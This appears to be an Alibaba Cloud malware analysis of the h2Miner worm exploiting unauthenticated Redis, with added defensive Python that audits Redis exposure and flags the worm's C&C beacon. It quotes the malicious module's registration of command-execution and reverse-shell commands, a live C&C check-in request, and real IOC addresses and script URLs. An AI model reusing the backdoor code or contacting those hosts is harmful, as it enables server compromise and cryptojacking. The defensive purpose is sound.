New Outbreak of h2Miner Worms Exploiting Redis RCE Detected

H2Miner Gang

Redis RCE

Worm Analysis

/* From the malicious Redis module's RedisModule_OnLoad(): it registers two
   custom commands, system.exec (handler DoCommand) and system.rev (handler
   RevShellCommand), which give the attacker command execution and a reverse
   shell on the Redis host once the module has been loaded. */
if (RedisModule_CreateCommand(ctx, "system.exec",
                              DoCommand, "readonly", 1, 1, 1) == REDISMODULE_ERR)
    return REDISMODULE_ERR;
if (RedisModule_CreateCommand(ctx, "system.rev",
                              RevShellCommand, "readonly", 1, 1, 1) == REDISMODULE_ERR)
    return REDISMODULE_ERR;
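The module above only helps the attacker once it can be loaded, which needs an instance that accepts commands without authentication. The following checker, an added example written for this page rather than code from the article or from the worm, speaks the Redis wire protocol (RESP) over a raw socket and reports the conditions that matter here: PING answered without AUTH, modules present in MODULE LIST, and the two command names registered by the module (system.exec, system.rev) being known to COMMAND INFO. The host and port, the module name "system" in the sample reply, and the sample replies themselves are assumptions for illustration.

```python
"""Audit a Redis instance for the exposure this worm relies on.

Added example (not code from the article or from the h2Miner module). It speaks
RESP over a raw socket and reports three conditions: the server answers PING
without AUTH, MODULE LIST shows loaded modules, and COMMAND INFO knows the
module's system.exec / system.rev commands. Host, port, and the sample replies
used for testing are assumptions.
"""
import socket

SUSPICIOUS_COMMANDS = ("system.exec", "system.rev")  # names from the module snippet


class Incomplete(Exception):
    """Raised when the buffer does not yet hold a whole reply."""


def encode_command(*args):
    """Encode a command as a RESP array of bulk strings (what redis-cli sends)."""
    parts = [b"*%d\r\n" % len(args)]
    for arg in args:
        raw = arg.encode() if isinstance(arg, str) else arg
        parts.append(b"$%d\r\n%s\r\n" % (len(raw), raw))
    return b"".join(parts)


def parse_reply(buf, pos=0):
    """Parse one RESP reply at buf[pos]; return (value, position after it).

    +simple -> str, -error -> Exception, :int -> int, $bulk -> str or None,
    *array -> list or None.
    """
    end = buf.find(b"\r\n", pos)
    if end < 0:
        raise Incomplete
    kind, line = buf[pos:pos + 1], buf[pos + 1:end]
    pos = end + 2
    if kind == b"+":
        return line.decode(), pos
    if kind == b"-":
        return Exception(line.decode()), pos
    if kind == b":":
        return int(line), pos
    if kind == b"$":
        n = int(line)
        if n < 0:
            return None, pos
        if len(buf) < pos + n + 2:
            raise Incomplete
        return buf[pos:pos + n].decode(errors="replace"), pos + n + 2
    if kind == b"*":
        n = int(line)
        if n < 0:
            return None, pos
        items = []
        for _ in range(n):
            item, pos = parse_reply(buf, pos)
            items.append(item)
        return items, pos
    raise ValueError("unknown RESP type %r" % kind)


def module_names(reply):
    """Names from a MODULE LIST reply: one flat [key, value, ...] array per module."""
    names = []
    for entry in reply if isinstance(reply, list) else []:
        if isinstance(entry, list):
            fields = dict(zip(entry[0::2], entry[1::2]))
            if "name" in fields:
                names.append(fields["name"])
    return names


def assess(ping_reply, module_list_reply, command_info_reply):
    """Turn the three replies into findings; pure so it can be tested offline."""
    findings = []
    if ping_reply != "PONG":
        # -NOAUTH (requirepass set) or -DENIED (protected mode): path is closed
        return findings
    findings.append("unauthenticated access: PING answered without AUTH")
    findings.extend("module loaded: %s" % n for n in module_names(module_list_reply))
    if isinstance(command_info_reply, list):
        # COMMAND INFO gives one entry per name; null means the command is unknown
        for cmd, info in zip(SUSPICIOUS_COMMANDS, command_info_reply):
            if info is not None:
                findings.append("backdoor command registered: %s" % cmd)
    return findings


def audit(host, port=6379, timeout=3.0):
    """Pipeline the three commands and assess the replies (assumed host/port)."""
    with socket.create_connection((host, port), timeout=timeout) as sock:
        sock.sendall(encode_command("PING")
                     + encode_command("MODULE", "LIST")
                     + encode_command("COMMAND", "INFO", *SUSPICIOUS_COMMANDS))
        buf, pos, replies = b"", 0, []
        while len(replies) < 3:
            try:
                value, pos = parse_reply(buf, pos)
                replies.append(value)
                continue
            except Incomplete:
                pass
            chunk = sock.recv(65536)
            if not chunk:  # server closed early, e.g. protected-mode DENIED
                break
            buf += chunk
    replies += [None] * (3 - len(replies))
    return assess(*replies)
```

Run it as `audit("10.0.0.5")` (address assumed) from a host that can reach the instance; an empty result means the server refused the unauthenticated PING, which is the state requirepass or protected mode leaves it in, while "module loaded" or "backdoor command registered" findings on an instance that should carry no modules are a sign it has already been hit.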
  • Download the file and execute
  • Execute the mining program
  • Maintain C&C communication and execute commands
GET /h HTTP/1.1
Host: 91.215.169.111
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36
Arch: amd64
Cores: 2
Mem: 3944
Os: linux
Osname: debian
Osversion: 10.0
Root: false
S: k
Uuid: xxxxxxxx-xxxx-xxxx-xxxx-xxxxxxxx
Version: 26
Accept-Encoding: gzip
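The check-in request above is easy to recognise in proxy logs or packet captures: it carries a Chrome User-Agent but also a set of host-profiling headers (Arch, Cores, Mem, Os, Osname, Osversion, Root, S, Uuid, Version) that no browser sends. The following classifier, an added example written for this page and not code from the article, matches on that header set so that the detection survives a change of C&C address, and additionally checks the Host against the IP addresses listed under IOC below. The two sample requests are constructed for the example (the worm one copies the capture above, with the Uuid masked as in the article); the threshold of four profiling headers is an assumption.

```python
"""Flag the h2Miner C&C check-in request in proxy or packet-capture data.

Added example, not from the original article. Matches on the host-profiling
headers the worm sends alongside a browser User-Agent, plus the Host against
the article's IOC list. Sample requests below are constructed; the threshold
of four headers is an assumption.
"""

PROFILE_HEADERS = {"arch", "cores", "mem", "os", "osname", "osversion",
                   "root", "s", "uuid", "version"}
C2_HOSTS = {"45.10.88.102", "91.215.169.111", "139.99.50.255",
            "46.243.253.167", "195.123.220.193"}  # from the IOC list
MIN_PROFILE_HEADERS = 4  # assumed threshold; the worm sends all ten


def parse_request(raw):
    """Split an HTTP/1.1 request head into (method, path, lowercase header dict)."""
    head = raw.split("\r\n\r\n", 1)[0]
    lines = head.split("\r\n")
    parts = lines[0].split(" ")
    if len(parts) != 3:
        raise ValueError("malformed request line: %r" % lines[0])
    headers = {}
    for line in lines[1:]:
        name, sep, value = line.partition(":")
        if sep:
            headers[name.strip().lower()] = value.strip()
    return parts[0], parts[1], headers


def classify(raw):
    """Return a verdict dict: beacon flag, reasons, and the profiled host data."""
    method, path, headers = parse_request(raw)
    present = PROFILE_HEADERS.intersection(headers)
    reasons = []
    if len(present) >= MIN_PROFILE_HEADERS:
        # Browser UA plus profiling headers is the worm's signature, not any one IP
        reasons.append("%d host-profiling headers (%s) with User-Agent %r"
                       % (len(present), ", ".join(sorted(present)),
                          headers.get("user-agent", "")[:20]))
    host = headers.get("host", "").split(":")[0]
    if host in C2_HOSTS:
        reasons.append("Host %s is a known h2Miner C&C address" % host)
    return {"beacon": bool(reasons), "reasons": reasons, "method": method,
            "path": path, "profile": {k: headers[k] for k in sorted(present)}}


# Constructed samples: the worm request copied from the capture above, and a
# normal browser request to an unrelated host for comparison.
WORM_REQUEST = (
    "GET /h HTTP/1.1\r\n"
    "Host: 91.215.169.111\r\n"
    "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 "
    "(KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36\r\n"
    "Arch: amd64\r\nCores: 2\r\nMem: 3944\r\nOs: linux\r\nOsname: debian\r\n"
    "Osversion: 10.0\r\nRoot: false\r\nS: k\r\n"
    "Uuid: xxxxxxxx-xxxx-xxxx-xxxx-xxxxxxxx\r\nVersion: 26\r\n"
    "Accept-Encoding: gzip\r\n\r\n")
BROWSER_REQUEST = (
    "GET /index.html HTTP/1.1\r\n"
    "Host: example.com\r\n"
    "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 "
    "(KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36\r\n"
    "Accept: text/html\r\nAccept-Encoding: gzip, deflate\r\n\r\n")
```

The profile dictionary the classifier returns (architecture, core count, memory, OS, whether the worm runs as root) is worth keeping with the alert, since it is the same inventory the worm reports to its operator and tells the responder what the infected host looks like.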

Other Attack Methods

IOC

142.44.191.122/t.sh
185.92.74.42/h.sh
142.44.191.122/spr.sh
142.44.191.122/spre.sh
195.3.146.118/unk.sh
45.10.88.102
91.215.169.111
139.99.50.255
46.243.253.167
195.123.220.193

Security Advice


Follow me to keep abreast with the latest technology news, industry insights, and developer trends. Alibaba Cloud website:https://www.alibabacloud.com
